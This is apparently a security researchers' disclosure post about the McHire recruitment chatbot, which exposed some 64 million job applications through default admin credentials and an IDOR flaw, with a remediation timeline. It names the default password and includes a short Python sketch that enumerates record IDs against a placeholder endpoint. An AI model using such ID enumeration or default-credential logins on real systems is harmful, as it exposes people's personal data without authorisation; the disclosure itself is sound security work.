Ian Carroll, Sam Curry / ian.sh
More than 90% of McDonald's franchises use "Olivia," an AI-powered chatbot, to screen job applicants. We discovered a vulnerability that could allow an attacker to access more than 64 million job applications. This data includes applicants' names, resumes, email addresses, phone numbers, and personality test results.
McHire is the chatbot recruitment platform used by about 90% of McDonald's franchisees. Prospective employees chat with a bot named Olivia, built by a company called Paradox.ai, which collects their personal information and shift preferences and administers personality tests. We started looking at McHire after seeing complaints on Reddit about the bot giving applicants nonsensical answers.
During a cursory security review lasting only a few hours, we identified two serious issues: the McHire administration interface for restaurant owners accepted the default credentials 123456:123456, and an insecure direct object reference (IDOR) on an internal API allowed us to access any contacts and chats we wanted. Together, they allowed us, and anyone else with a McHire account and access to any inbox, to retrieve the personal data of more than 64 million applicants.
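For readers unfamiliar with the pattern, here is a minimal, hypothetical sketch of how an IDOR like this is typically demonstrated: a low-privilege session requests records by sequential numeric IDs and checks whether the server returns data that account should not be able to see. The endpoint, parameter names, and IDs below are placeholders for illustration, not the actual McHire or Paradox.ai API.

```python
# Hypothetical IDOR probe: endpoint, cookie, and IDs are placeholders,
# not the real McHire/Paradox.ai API.
import requests

BASE_URL = "https://example-ats.invalid/api/leads"       # assumed endpoint
SESSION = {"session": "low-privilege-test-account-token"}  # our own test account

def lead_is_accessible(lead_id: int) -> bool:
    """Fetch an applicant ("lead") record by numeric ID and report whether
    the server returns it to an account that should not own it."""
    resp = requests.get(f"{BASE_URL}/{lead_id}", cookies=SESSION, timeout=10)
    return resp.status_code == 200

# An IDOR exists if simply incrementing or decrementing the numeric ID
# exposes other applicants' records to this unrelated account.
for lead_id in range(1000, 1005):  # example IDs only
    if lead_is_accessible(lead_id):
        print(f"lead {lead_id}: accessible to our account (potential IDOR)")
```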
We disclosed this issue to Paradox.ai and McDonald’s at the same time.
06/30/2025 5:46PM ET: Disclosed to Paradox.ai and McDonald’s
06/30/2025 6:24PM ET: McDonald’s confirms receipt and requests technical details
06/30/2025 7:31PM ET: Credentials are no longer usable to access the app
07/01/2025 9:44PM ET: Followed up on status
07/01/2025 10:18PM ET: Paradox.ai confirms the issues have been resolved